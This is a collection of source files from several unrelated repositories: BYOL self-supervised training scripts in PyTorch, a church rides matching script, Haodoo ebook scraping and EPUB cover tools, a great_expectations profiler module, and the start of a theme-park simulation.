parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--model-path', '--mp', type=str,
help='byol trained model path')
# Paths
parser.add_argument('-d', '--dataset', default='neu', type=str)
parser.add_argument('--image_folder', type=str, required=True,
help='path to your folder of images for self-supervised learning')
parser.add_argument('--board-path', '--bp', default='../board', type=str,
help='tensorboardx path')
parser.add_argument('--board-tag', '--tg', default='fine-tuned', type=str,
help='tensorboardx writer tag')
args = parser.parse_args()
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Torch Seed
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
# Random Lib Seed
random.seed(args.manualSeed)
# Numpy Seed
np.random.seed(args.manualSeed)
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# constants
args.image_size = 256
args.workers = multiprocessing.cpu_count()
args.task_time = datetime.now().isoformat()
output_name = "{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
args.depth,
args.batch_size,
args.lr,
args.board_tag)
args.checkpoint = os.path.join(args.checkpoint, args.dataset, output_name, args.task_time)
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
writer_train = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time, "train"))
writer_test = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time, "test"))
if args.arch is "resnet":
if args.depth == 18:
model = models.resnet18(pretrained=False).cuda()
elif args.depth == 34:
model = models.resnet34(pretrained=False).cuda()
elif args.depth == 50:
model = models.resnet50(pretrained=False).cuda()
elif args.depth == 101:
model = models.resnet101(pretrained=False).cuda()
else:
assert ("Not supported Depth")
if not args.from_scratch:
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint)
print("\t==> Fine tune full layers? : {}".format(str(args.tune_all)))
# Simple manual fine tuning logic
# if full == False, only last layer will be fine tuned~!!
if not args.tune_all:
params = model.parameters()
for param in params:
param.requires_grad = False
model.num_classes = args.num_classes
num_ftrs = model.fc.in_features
model.fc = nn.Linear(num_ftrs, args.num_classes)
model = torch.nn.DataParallel(model).cuda()
opt = torch.optim.Adam(model.parameters(), lr=args.lr)
criterion = nn.CrossEntropyLoss().cuda()
softmax = nn.Softmax(1).cuda()
# Data loading code
traindir = os.path.join(args.image_folder, 'train')
testdir = os.path.join(args.image_folder, 'test')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
trainloader = torch.utils.data.DataLoader(
datasets.ImageFolder(traindir, transforms.Compose([
transforms.Resize(args.image_size),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(0.4, 0.4, 0.4),
transforms.ToTensor(),
# normalize,
])),
batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
testloader = torch.utils.data.DataLoader(
datasets.ImageFolder(testdir, transforms.Compose([
transforms.Resize(args.image_size),
transforms.ToTensor(),
# normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
losses_train = AverageMeter()
top1_train = AverageMeter()
top5_train = AverageMeter()
losses_test = AverageMeter()
top1_test = AverageMeter()
top5_test = AverageMeter()
for epoch in range(args.epoch):
bar_train = Bar('Processing', max=len(trainloader))
bar_test = Bar('Processing', max=len(testloader))
train(model, criterion, opt, softmax, bar_train, epoch, trainloader, losses_train, top1_train, top5_train,
writer_train)
test(model, criterion, softmax, bar_test, epoch, testloader, losses_test, top1_test, top5_test,
writer_test)
# save your improved network
torch.save(model.state_dict(), os.path.join(args.checkpoint, 'byol-finetune.pt'))
if __name__ == '__main__':
main()
```
#### File: jhvics1/pytorch-byol/byol_train.py
```python
import os
import random
import argparse
import multiprocessing
import numpy as np
import torch
from torchvision import models, transforms
from torch.utils.data import DataLoader, Dataset
from pathlib import Path
from PIL import Image
from utils import Bar, config, mkdir_p, AverageMeter
from datetime import datetime
from tensorboardX import SummaryWriter
from byol_pytorch import BYOL
# arguments
parser = argparse.ArgumentParser(description='byol-lightning-test')
# Architecture & hyper-parameter
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet',
help='model architecture: | [resnet, ...] (default: resnet18)')
parser.add_argument('--depth', type=int, default=18, help='Model depth.')
parser.add_argument('-c', '--checkpoint', default='../checkpoints', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--epoch', type=int, default=100, help='Epoch')
parser.add_argument('--batch-size', type=int, default=32, help='Batch size')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
# Device options
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
# Paths
parser.add_argument('-d', '--dataset', default='neu', type=str)
parser.add_argument('--image_folder', type=str, required=True,
help='path to your folder of images for self-supervised learning')
parser.add_argument('--board-path', '--bp', default='../board', type=str,
help='tensorboardx path')
parser.add_argument('--board-tag', '--tg', default='byol', type=str,
help='tensorboardx writer tag')
args = parser.parse_args()
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Torch Seed
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
# Random Lib Seed
random.seed(args.manualSeed)
# Numpy Seed
np.random.seed(args.manualSeed)
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# constants
args.image_size = 256
NUM_GPUS = 1
IMAGE_EXTS = ['.jpg', '.png', '.jpeg', '.bmp']
NUM_WORKERS = multiprocessing.cpu_count()
# task_time = datetime.now().isoformat()
# args.checkpoint = os.path.join(args.checkpoint, args.dataset, "{}-{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
# args.depth,
# args.batch_size,
# args.lr,
# args.board_tag),
# task_time)
# if not os.path.isdir(args.checkpoint):
# mkdir_p(args.checkpoint)
# config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
#
# writer_train = SummaryWriter(
# log_dir=os.path.join(args.board_path, args.dataset, "{}-{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
# args.depth,
# args.batch_size,
# args.lr,
# args.board_tag),
# task_time, "train"))
args.task_time = datetime.now().isoformat()
output_name = "{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
args.depth,
args.batch_size,
args.lr,
args.board_tag)
args.checkpoint = os.path.join(args.checkpoint, args.dataset, output_name, args.task_time)
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
writer_train = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time))
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
def expand_greyscale(t):
return t.expand(3, -1, -1)
class ImagesDataset(Dataset):
def __init__(self, folder, image_size):
super().__init__()
self.folder = folder
self.paths = []
for path in Path(f'{folder}').glob('**/*'):
_, ext = os.path.splitext(path)
if ext.lower() in IMAGE_EXTS:
self.paths.append(path)
print(f'{len(self.paths)} images found')
self.transform = transforms.Compose([
transforms.Resize(args.image_size),
transforms.RandomSizedCrop((args.image_size, args.image_size)),
transforms.ColorJitter(0.4, 0.4, 0.4),
transforms.ToTensor(),
# normalize
])
def __len__(self):
return len(self.paths)
def __getitem__(self, index):
path = self.paths[index]
img = Image.open(path)
img = img.convert('RGB')
return self.transform(img)
if args.arch is "resnet":
if args.depth == 18:
model = models.resnet18(pretrained=False).cuda()
elif args.depth == 34:
model = models.resnet34(pretrained=False).cuda()
elif args.depth == 50:
model = models.resnet50(pretrained=False).cuda()
elif args.depth == 101:
model = models.resnet101(pretrained=False).cuda()
else:
assert ("Not supported Depth")
learner = BYOL(
model,
image_size=args.image_size,
hidden_layer='avgpool',
projection_size=256,
projection_hidden_size=4096,
moving_average_decay=0.99,
use_momentum=False # turn off momentum in the target encoder
)
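# Editorial note: with use_momentum=False the target encoder is not an exponential moving
# average of the online encoder, which the byol-pytorch README describes as SimSiam-style training.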
opt = torch.optim.Adam(learner.parameters(), lr=args.lr)
ds = ImagesDataset(args.image_folder, args.image_size)
trainloader = DataLoader(ds, batch_size=args.batch_size, num_workers=NUM_WORKERS, shuffle=True)
losses = AverageMeter()
for epoch in range(args.epoch):
bar = Bar('Processing', max=len(trainloader))
for batch_idx, inputs in enumerate(trainloader):
loss = learner(inputs.cuda())
losses.update(loss.data.item(), inputs.size(0))
opt.zero_grad()
loss.backward()
opt.step()
# plot progress
bar.suffix = 'Epoch {epoch} - ({batch}/{size}) | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} '.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(trainloader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
)
n_iter = epoch * len(trainloader) + batch_idx + 1
writer_train.add_scalar('Train/loss', loss.data.item(), n_iter)
bar.next()
writer_train.add_scalar('Avg.loss', losses.avg, epoch)
bar.finish()
# save your improved network
torch.save(model.state_dict(), os.path.join(args.checkpoint, 'byol.pt'))
``` |
{
"source": "jhwang73/nlf-rides-organizer",
"score": 3
} |
#### File: jhwang73/nlf-rides-organizer/rides_organizer.py
```python
import csv
import os
from collections import defaultdict
from pprint import pprint
from copy import deepcopy
from math import ceil
from collections import Counter
PREFERRED_PLAN = "preferred post church plan"
# gets the path to the filename that is in the same directory as this script
filename = "nlf_rides.csv"
path = os.getcwd() + "/" + filename
# duplicate check
users = set()
# drivers
ndrivers = []
sdrivers = []
odrivers = []
all_drivers = []
# riders
nriders = []
sriders = []
oriders = []
# final matches
matches = defaultdict(list)
preferences = defaultdict(str)
# have to manually match
unmatched = []
# process the raw csv
with open(path, newline = '', encoding="utf8") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for idx, row in enumerate(reader):
if idx == 0: continue
# takes care of people who signed up twice on accident
# make sure people know their first sign up is what counts
# we can come back later and change this to latest if it matters
if row[1] not in users: users.add(row[1])
else: continue
# mark their preference to refer to later
preferences[row[1]] = row[8]
# split into drivers
if row[6] == "Yes":
if row[4] == "North (Brown, Duncan, Jones, Martel, McMurtry)": ndrivers.append(row)
elif row[4] == "South (Baker, Hanszen, Lovett, <NAME>, Wiess, <NAME>)": sdrivers.append(row)
else: odrivers.append(row)
# and riders
else:
if row[4] == "North (Brown, Duncan, Jones, Martel, McMurtry)": nriders.append(row)
elif row[4] == "South (Baker, Hanszen, Lovett, <NAME>, Wiess, <NAME>)": sriders.append(row)
else: oriders.append(row)
all_drivers = ndrivers + sdrivers + odrivers
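# Column layout assumed by the parsing above (inferred from the indices used in this script;
# the actual form export may differ): row[1] = respondent identifier, row[4] = college area,
# row[5] = service time, row[6] = "Yes" if willing to drive, row[8] = preferred post-church plan.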
def load_balance():
# we're prioritizing proximity here over load balancing
# first we want to make sure there are enough north drivers
if len(ndrivers) * 4.0 / len(nriders) < 1.0:
num_drivers_needed = ceil((len(nriders) - len(ndrivers) * 4.0) / 4.0)
for _ in range(num_drivers_needed):
if odrivers: ndrivers.append(odrivers.pop())
else: ndrivers.append(sdrivers.pop())
def get_driver(dname):
for driver in all_drivers:
if dname == driver[1]:
return driver
raise ValueError("this driver does not exist in our records")
def match(riders, drivers):
'''
prioritizes people who have a strong after church preference
this can definitely be optimized but should work just fine for now
one more thing to consider is whether we should also only match on the
drivers who have preferences first, saving those who mark themselves flexible
'''
    # the callers split the riders into those who have an after-church preference and those who do not
    # now assign a driver to each rider, brute force
for rider in riders:
rname = rider[1]
matched = False
# the first pass is seeing if there is an optimal match possible
for driver in drivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5] and (driver[8] == rider[8] or driver[8] == "I'm flexible :)" or rider[8] == "I'm flexible :)"):
# since the driver now has a non flexible rider the driver is also now non flexible
if driver[8] != rider[8]: driver[8] = rider[8]
matched = True
matches[dname].append((rname, "optimal"))
break
if matched: continue
# if we get here then we know there wasn't an optimal match for after service
# but we'll at least try to match the service
        for driver in drivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# if they get here, we could not find an appropriate match among the given set of drivers
# let's see if there are any other current drivers that have seats left
for dname in matches.keys():
driver = get_driver(dname)
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
if (driver[8] == rider[8] or rider[8] == "I'm flexible :)"): matches[dname].append((rname, "optimal"))
else: matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# we're trying to minimize the number of drivers that have to drive but
# let's see if there are any drivers that aren't listed to drive that can drive
for driver in all_drivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
if (driver[8] == rider[8] or rider[8] == "I'm flexible :)"): matches[dname].append((rname, "optimal"))
else: matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# if they got here we really were unable to either find a seat for them period
# or they don't have someone going to the same service as them
unmatched.append(rname)
def split_into_flexible(riders):
non_flexible = []
flexible = []
for rider in riders:
if rider[8] == "I'm flexible :)": flexible.append(rider)
else: non_flexible.append(rider)
return flexible, non_flexible
def match_all():
# when matching give priority to those who have an after church preference
# since it'll be easier to manually adjust for those who don't end up matched
nriders_flexible, nriders_non_flexible = split_into_flexible(nriders)
match(nriders_non_flexible, ndrivers)
match(nriders_flexible, ndrivers)
sdrivers.extend(odrivers)
sriders.extend(oriders)
sriders_flexible, sriders_non_flexible = split_into_flexible(sriders)
match(sriders_non_flexible, sdrivers)
match(sriders_flexible, sdrivers)
def write_cars_vertical(cars):
"""
Ad-hoc solution to make spreadsheet copiable outputs
"""
copy_output_file = "copy_paste.csv"
# try:
with open(copy_output_file, 'w') as text_file:
for car in cars:
text_file.write(car["driver"] + ',' + str(car[PREFERRED_PLAN]) + "\n")
for rider_key in car:
if rider_key.startswith("rider #"):
text_file.write(car[rider_key][0] + ',' + car[rider_key][1] + "\n")
text_file.write("\n")
# except IOError:
# print("I/O error")
# turn these matches into a list of dicts
def write():
final_matches = []
# construct a row
for driver in matches.keys():
d = {"driver": driver}
pref_list = []
for idx, rider in enumerate(matches[driver]):
idx += 1
d["rider #" + str(idx)] = rider
print(rider[0])
pref_list.append(preferences[rider[0]])
c = Counter(pref_list)
d[PREFERRED_PLAN] = c.most_common()
final_matches.append(d)
pprint(final_matches)
write_cars_vertical(final_matches)
cols = final_matches[0].keys()
csv_file = "matches.csv"
try:
with open(csv_file, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=cols)
writer.writeheader()
for data in final_matches:
writer.writerow(data)
except IOError:
print("I/O error")
final_unmatched = []
for remaining in unmatched:
d = {"unmatched": remaining}
final_unmatched.append(d)
pprint(unmatched)
if final_unmatched:
cols = final_unmatched[0].keys()
csv_file = "unmatched.csv"
try:
with open(csv_file, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=cols)
writer.writeheader()
for data in final_unmatched:
writer.writerow(data)
except IOError:
print("I/O error")
load_balance()
match_all()
pprint(matches)
pprint(unmatched)
write()
``` |
{
"source": "jhwangus/haodoo",
"score": 3
} |
#### File: jhwangus/haodoo/haodoo_cover.py
```python
import sys, getopt, os, shutil
from ebooklib import epub
def usage():
''' Display command usage.'''
sys.stderr.write(__doc__)
sys.stderr.flush()
def check_file(fname, ext):
if not fname.lower().endswith(ext):
sys.stderr.write(ext.upper() + ": " + fname + " does not have a correct extension!\n")
sys.exit(2)
if not os.path.isfile(fname):
sys.stderr.write("File " + fname + " does not exist!\n")
sys.exit(2)
def main(argv):
# getopt
try:
opts, args = getopt.getopt(argv, "h")
except getopt.GetoptError:
usage()
sys.exit(2)
# handle options
for opt, optarg in opts:
if opt == '-h':
usage()
sys.exit()
if len(args) == 2:
epub_fname = args[0]
jpg_fname = args[1]
check_file(epub_fname, ".epub")
check_file(jpg_fname, ".jpg")
else:
usage()
sys.exit()
book = epub.read_epub(epub_fname)
f = open(jpg_fname, 'rb')
content = f.read()
f.close()
book.set_cover('cover.jpg', content)
epub.write_epub(epub_fname, book, {})
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jhwangus/haodoo/haodoo_pp.py
```python
import sys, getopt, os, shutil, csv
from ebooklib import epub
def usage():
''' Display command usage.'''
sys.stderr.write(__doc__)
sys.stderr.flush()
def check_file(fname, ext):
if not fname.lower().endswith(ext):
sys.stderr.write(ext.upper() + ": " + fname + " does not have a correct extension!\n")
sys.exit(2)
if not os.path.isfile(fname):
sys.stderr.write("File " + fname + " does not exist!\n")
sys.exit(2)
def add_cover(epub_fname, jpg_fname):
book = epub.read_epub(epub_fname)
with open(jpg_fname, 'rb') as f:
book.set_cover('cover.jpg', f.read())
epub.write_epub(epub_fname, book, {})
def main(argv):
# getopt
try:
opts, args = getopt.getopt(argv, "h")
except getopt.GetoptError:
usage()
sys.exit(2)
# handle options
for opt, optarg in opts:
if opt == '-h':
usage()
sys.exit()
if len(args) == 1:
csv_name = args[0]
else:
usage()
sys.exit()
# check dirs
if not os.path.isdir('covers'):
sys.stderr.write('Cannot find cover images directory "covers/"\n')
sys.exit(2)
if not os.path.isdir('epub'):
sys.stderr.write('Cannot find cover images directory "epubs/"\n')
sys.exit(2)
if not os.path.exists('books'):
os.makedirs('books')
elif not os.path.isdir('books'):
sys.stderr.write('Cannot create output directory "books/"\n')
sys.stderr.write('A file with the same name exists.\n')
sys.exit(2)
#
with open(csv_name, encoding='utf-8') as f:
reader = csv.reader(f)
count = 0
next(reader, None)
for row in reader:
auth = row[0]
title = row[1]
i = row[2].find('P=')
epub = row[2][i+2:]
img = os.path.basename(row[4])
print(auth + '-' + title, epub, img)
shutil.copy('epub/' + epub, 'books/' + epub)
if img != '':
add_cover('books/' + epub, 'covers/' + img)
os.replace('books/' + epub, 'books/' + auth + ' - ' + title + '.epub')
count = count + 1
print('Total =', count)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jhwangus/haodoo/haodoo_spider.py
```python
import os, scrapy, urllib.request, hashlib
class haodooSpyder(scrapy.Spider):
name = "haodoo"
custom_settings = {
'DOWNLOAD_DELAY' : '0.35',
}
start_urls = ['http://haodoo.net']
def parse(self, response):
if not os.path.exists('epub'):
os.makedirs('epub')
if not os.path.exists('covers'):
os.makedirs('covers')
headpages = response.css('table')[2].css('td.a03 a::attr(href)').extract()
for pg in headpages:
if pg.find('audio') < 0 and pg.find('letter') < 0:
url = response.urljoin(pg)
yield response.follow(url, self.parse_heading)
def parse_heading(self, response):
links = response.css('script')[6].re(r'<a href="(.*)">')
for ln in links:
url = response.urljoin(ln)
yield response.follow(url, self.parse_listing)
def parse_listing(self, response):
books = response.css('div.a03 a::attr(href)').extract()
for bk in books:
if bk.find('.pdb') >= 0 or bk.find(':') >= 0:
# print(bk)
continue
url = response.urljoin(bk)
yield response.follow(url, self.parse_book)
def download(self, url, filename):
if url != '':
urllib.request.urlretrieve(url, filename)
m = hashlib.md5()
with open(filename, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
m.update(data)
return m.hexdigest()
else:
return ''
def parse_book(self, response):
names = response.css('script').re(r'SetTitle\("(.*)[《|【](.*)[》|】]"\);')
if len(names) == 0:
names = response.css('table')[6].re(r'<font .*>(.*)</font>[《|【](.*)[》|】]<input')
if len(names) >= 2:
author = names[0]
title = names[1]
else:
author = 'Unknown'
title = 'Unknown'
book_ids = response.css('input::attr(onclick)').re(r'DownloadEpub\(\'(.*)\'\)')
images = response.css('img::attr(src)').re(r'(covers/.*)')
count = len(book_ids)
imgl = len(images)
if count > 1:
i = 1
for book in book_ids:
ref = '?M=d&P=' + book + '.epub'
url = response.urljoin(ref)
if author == 'Unknown':
title = book
if imgl == 0:
img = ''
imgurl = ''
elif imgl < i:
img = images[-1]
imgurl = response.urljoin(img)
else:
img = images[i - 1]
imgurl = response.urljoin(img)
epub_md5 = self.download(url, 'epub/' + book + '.epub')
img_md5 = self.download(imgurl, img)
yield {
'author' : author,
'title' : title + '%02d' % i,
'epub' : url,
'epub_md5' : epub_md5,
'image' : imgurl,
'img_md5': img_md5,
}
i = i + 1
elif count == 1:
ref = '?M=d&P=' + book_ids[0] + '.epub'
url = response.urljoin(ref)
if author == 'Unknown':
title = book_ids[0]
if imgl > 0:
img = images[0]
imgurl = response.urljoin(img)
else:
img = ''
imgurl = ''
epub_md5 = self.download(url, 'epub/' + book_ids[0] + '.epub')
img_md5 = self.download(imgurl, img)
yield {
'author' : author,
'title' : title,
'epub' : url,
'epub_md5' : epub_md5,
'image' : imgurl,
'img_md5': img_md5,
}
``` |
{
"source": "jhweaver/great_expectations",
"score": 2
} |
#### File: great_expectations/profile/base.py
```python
import abc
import logging
import time
import warnings
from enum import Enum
from typing import Any
from dateutil.parser import parse
from great_expectations.core import ExpectationSuite, RunIdentifier
from great_expectations.exceptions import GreatExpectationsError
from ..data_asset import DataAsset
from ..dataset import Dataset
logger = logging.getLogger(__name__)
class ProfilerDataType(Enum):
"""Useful data types for building profilers."""
INT = "int"
FLOAT = "float"
STRING = "string"
BOOLEAN = "boolean"
DATETIME = "datetime"
UNKNOWN = "unknown"
class ProfilerCardinality(Enum):
"""Useful cardinality categories for building profilers."""
NONE = "none"
ONE = "one"
TWO = "two"
FEW = "few"
VERY_FEW = "very few"
MANY = "many"
VERY_MANY = "very many"
UNIQUE = "unique"
class ProfilerTypeMapping:
"""Useful backend type mapping for building profilers."""
# Future support possibility: JSON (RECORD)
# Future support possibility: BINARY (BYTES)
INT_TYPE_NAMES = [
"INTEGER",
"integer",
"int",
"INT",
"TINYINT",
"BYTEINT",
"SMALLINT",
"BIGINT",
"IntegerType",
"LongType",
"DECIMAL",
]
FLOAT_TYPE_NAMES = [
"FLOAT",
"DOUBLE",
"FLOAT4",
"FLOAT8",
"DOUBLE_PRECISION",
"NUMERIC",
"FloatType",
"DoubleType",
"float",
"number",
]
STRING_TYPE_NAMES = [
"CHAR",
"VARCHAR",
"NVARCHAR",
"TEXT",
"STRING",
"StringType",
"string",
"str",
]
BOOLEAN_TYPE_NAMES = [
"BOOLEAN",
"boolean",
"BOOL",
"TINYINT",
"BIT",
"bool",
"BooleanType",
]
DATETIME_TYPE_NAMES = [
"DATETIME",
"DATE",
"TIME",
"TIMESTAMP",
"DateType",
"TimestampType",
"datetime64",
"Timestamp",
]
class Profiler(object, metaclass=abc.ABCMeta):
"""
Profilers creates suites from various sources of truth.
These sources of truth can be data or non-data sources such as DDLs.
When implementing a Profiler ensure that you:
    - Implement a ._profile() method
- Optionally implement .validate() method that verifies you are running on the right
kind of object. You should raise an appropriate Exception if the object is not valid.
"""
def __init__(self, configuration: dict = None):
self.configuration = configuration
def validate(self, item_to_validate: Any) -> None:
pass
def profile(self, item_to_profile: Any, suite_name: str = None) -> ExpectationSuite:
self.validate(item_to_profile)
expectation_suite = self._profile(item_to_profile, suite_name=suite_name)
return expectation_suite
@abc.abstractmethod
def _profile(
self, item_to_profile: Any, suite_name: str = None
) -> ExpectationSuite:
pass
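# Minimal illustrative subclass (an editorial sketch, not part of great_expectations): it
# follows the contract described in the Profiler docstring above -- a required _profile()
# plus an optional validate(). The suite construction assumes the
# ExpectationSuite(expectation_suite_name=...) signature used elsewhere in this codebase.
class _ExampleNoOpProfiler(Profiler):
    def validate(self, item_to_validate: Any) -> None:
        # Reject an obviously invalid input, as suggested by the docstring above.
        if item_to_validate is None:
            raise GreatExpectationsError("Cannot profile None")

    def _profile(self, item_to_profile: Any, suite_name: str = None) -> ExpectationSuite:
        # Return an empty suite; a real profiler would inspect item_to_profile here.
        return ExpectationSuite(expectation_suite_name=suite_name or "example_suite")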
class DataAssetProfiler(object):
@classmethod
def validate(cls, data_asset):
return isinstance(data_asset, DataAsset)
class DatasetProfiler(DataAssetProfiler):
@classmethod
def validate(cls, dataset):
return isinstance(dataset, Dataset)
@classmethod
def add_expectation_meta(cls, expectation):
expectation.meta[str(cls.__name__)] = {"confidence": "very low"}
return expectation
@classmethod
def add_meta(cls, expectation_suite, batch_kwargs=None):
class_name = str(cls.__name__)
expectation_suite.meta[class_name] = {
"created_by": class_name,
"created_at": time.time(),
}
if batch_kwargs is not None:
expectation_suite.meta[class_name]["batch_kwargs"] = batch_kwargs
new_expectations = [
cls.add_expectation_meta(exp) for exp in expectation_suite.expectations
]
expectation_suite.expectations = new_expectations
if "notes" not in expectation_suite.meta:
expectation_suite.meta["notes"] = {
"format": "markdown",
"content": [
"_To add additional notes, edit the <code>meta.notes.content</code> field in the appropriate Expectation json file._"
# TODO: be more helpful to the user by piping in the filename.
# This will require a minor refactor to make more DataContext information accessible from this method.
# "_To add additional notes, edit the <code>meta.notes.content</code> field in <code>expectations/mydb/default/movies/BasicDatasetProfiler.json</code>_"
],
}
return expectation_suite
@classmethod
def profile(
cls,
data_asset,
run_id=None,
profiler_configuration=None,
run_name=None,
run_time=None,
):
assert not (run_id and run_name) and not (
run_id and run_time
), "Please provide either a run_id or run_name and/or run_time."
if isinstance(run_id, str) and not run_name:
warnings.warn(
"String run_ids will be deprecated in the future. Please provide a run_id of type "
"RunIdentifier(run_name=None, run_time=None), or a dictionary containing run_name "
"and run_time (both optional). Instead of providing a run_id, you may also provide"
"run_name and run_time separately.",
DeprecationWarning,
)
try:
run_time = parse(run_id)
except (ValueError, TypeError):
pass
run_id = RunIdentifier(run_name=run_id, run_time=run_time)
elif isinstance(run_id, dict):
run_id = RunIdentifier(**run_id)
elif not isinstance(run_id, RunIdentifier):
run_name = run_name or "profiling"
run_id = RunIdentifier(run_name=run_name, run_time=run_time)
if not cls.validate(data_asset):
raise GreatExpectationsError("Invalid data_asset for profiler; aborting")
expectation_suite = cls._profile(
data_asset, configuration=profiler_configuration
)
batch_kwargs = data_asset.batch_kwargs
expectation_suite = cls.add_meta(expectation_suite, batch_kwargs)
validation_results = data_asset.validate(
expectation_suite, run_id=run_id, result_format="SUMMARY"
)
expectation_suite.add_citation(
comment=str(cls.__name__) + " added a citation based on the current batch.",
batch_kwargs=data_asset.batch_kwargs,
batch_markers=data_asset.batch_markers,
batch_parameters=data_asset.batch_parameters,
)
return expectation_suite, validation_results
@classmethod
def _profile(cls, dataset, configuration=None):
raise NotImplementedError
``` |
{
"source": "JHWelch/shapeland",
"score": 4
} |
#### File: shapeland/Code/park.py
```python
import random
import os
import json
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from tabulate import tabulate
from agent import Agent
from attraction import Attraction
from activity import Activity
class Park:
""" Park simulation class """
def __init__(self, attraction_list, activity_list, plot_range, version=1.0, random_seed=0, verbosity=0):
"""
Required Inputs:
attraction_list: list of attractions dictionaries
activity_list: list of activity dictionaries
Optional Inputs:
random_seed: seeds random number generation for reproduction
version: specify the version
verbosity: display metrics
"""
# static
self.attraction_list = attraction_list
self.activity_list = activity_list
self.plot_range = plot_range
self.random_seed = random_seed
self.version = version
self.verbosity = verbosity
# dynamic
self.schedule = {}
self.agents = {}
self.attractions = {}
self.activities = {}
self.history = {"total_active_agents": {}, "distributed_passes": 0, "redeemed_passes": 0}
self.time = 0
self.arrival_index = 0
self.park_close = None
def generate_arrival_schedule(self, arrival_seed, total_daily_agents, perfect_arrivals):
"""
Builds a schedule that determines how many agents arrive each minute throughout the day.
Each minute of the day is assigned from a Poisson distribution. A Poisson distribution generally
characterizes arrivals in many different settings. It is good to use if the arrivals are all
random and independent of each other.
Required Inputs:
arrival_seed: Dictionary of arrival distributions
total_daily_agents: Total agents visiting during the day
Optional Inputs:
perfect_arrivals: Enforces the exact number of daily agents to visit
"""
if sum(arrival_seed.values()) != 100:
raise AssertionError(
"The percent of hourly arrivals does not add up to 100%"
)
# determine how many hours the park is open
operating_hours = len(arrival_seed)
if operating_hours > 24:
raise AssertionError(f"Arrival Schedule suggests park is open more than 24 hours ({operating_hours})")
# generate arrivals per minute by drawing from poisson distribution
for hour, key in zip(range(operating_hours), arrival_seed):
arrival_pct = arrival_seed[key]
# The first hour with 0 arrivals dictates the park is closed
if arrival_pct == 0 and not self.park_close:
self.park_close = hour * 60
total_hour_agents = total_daily_agents * arrival_pct * 0.01 # convert integer pct to decimal
expected_minute_agents = total_hour_agents/60
            # enforces randomness across hours but retains reproducibility
rng = np.random.default_rng(self.random_seed+hour)
minute_arrivals = list(rng.poisson(lam=expected_minute_agents, size=60))
for minute, arrivals in zip(range(60), minute_arrivals):
exact_minute = hour*60 + minute
self.schedule.update({exact_minute: arrivals})
        # enforce perfect arrivals
random.seed(self.random_seed)
if perfect_arrivals:
actual_total_daily_agents = sum(self.schedule.values())
dif = actual_total_daily_agents - total_daily_agents
if dif > 0:
for _ in range(dif):
rng_key = random.choice(list(key for key, val in self.schedule.items() if val>0))
self.schedule[rng_key] -= 1
if dif < 0:
for _ in range(dif*-1):
rng_key = random.choice(list(key for key, val in self.schedule.items() if val>0))
self.schedule[rng_key] += 1
assert sum(self.schedule.values()) == total_daily_agents
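    # Illustrative sketch of the draw above (editorial note, not used by the simulation):
    # with 600 guests expected in an hour, each minute's arrivals are sampled as
    #     np.random.default_rng(0).poisson(lam=600 / 60, size=60)
    # i.e. roughly 10 arrivals per minute with Poisson noise around that mean.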
def generate_agents(self, behavior_archetype_distribution, exp_ability_pct, exp_wait_threshold, exp_limit):
""" Take a dictionary of agent behavior archetype distributions. Initializes agents. """
if sum(behavior_archetype_distribution.values()) != 100:
raise AssertionError(
"The percent of behavior archetypes does not add up to 100%"
)
total_agents = sum(self.schedule.values())
for agent_id in range(total_agents):
random.seed(self.random_seed + agent_id)
exp_ability = random.uniform(0,1) < exp_ability_pct
